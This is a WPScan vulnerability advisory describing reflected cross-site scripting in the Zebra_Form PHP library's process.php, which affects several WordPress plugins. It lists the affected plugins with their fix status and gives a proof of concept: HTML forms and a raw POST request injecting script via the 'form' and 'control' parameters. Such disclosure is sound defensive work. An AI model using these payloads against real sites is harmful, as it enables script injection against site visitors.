WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)

Description

The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file.

There is currently no patch available and the removal of this library is recommended.

Proof of Concept

Via $_GET['form']:<br/><br/>
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=</script><img src onerror=alert(/XSS-form/)>&control=upload" method="post" enctype="multipart/form-data">
    <input type="file" name="upload"/>
    <input type="submit" name="submit" value="Send">
</form>
<br/>

Via $_GET['control']:<br/><br/>
<form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=f&control=</script><svg/onload=alert(/XSS-control/)>" method="post" enctype="multipart/form-data">
    <input type="file" name="</script><svg/onload=alert(/XSS-control/)>"/>
    <input type="submit" name="submit" value="Send">
</form>

POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
Content-Length: 241
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------77916619616724262872902741074
Content-Disposition: form-data; name="upload"; filename="a.txt"
Content-Type: text/plain

Test

-----------------------------77916619616724262872902741074-- 

Affects Plugins

wp-ticket
Fixed in version 5.6.0
teaser-maker-standard
No known fix - plugin closed
ad-swapper
No known fix - plugin closed
drug-search
No known fix - plugin closed
wp-inimat
No known fix - plugin closed

References

URL
https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
URL
https://plugins.trac.wordpress.org/changeset/2177753

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Verified

Yes

WPVDB ID
e4b796fa-3215-43ff-a6aa-71f6e1db25e5

Timeline

Publicly Published

2021-02-14 (about 1 years ago)

Added

2021-02-14 (about 1 years ago)

Last Updated

2021-02-16 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us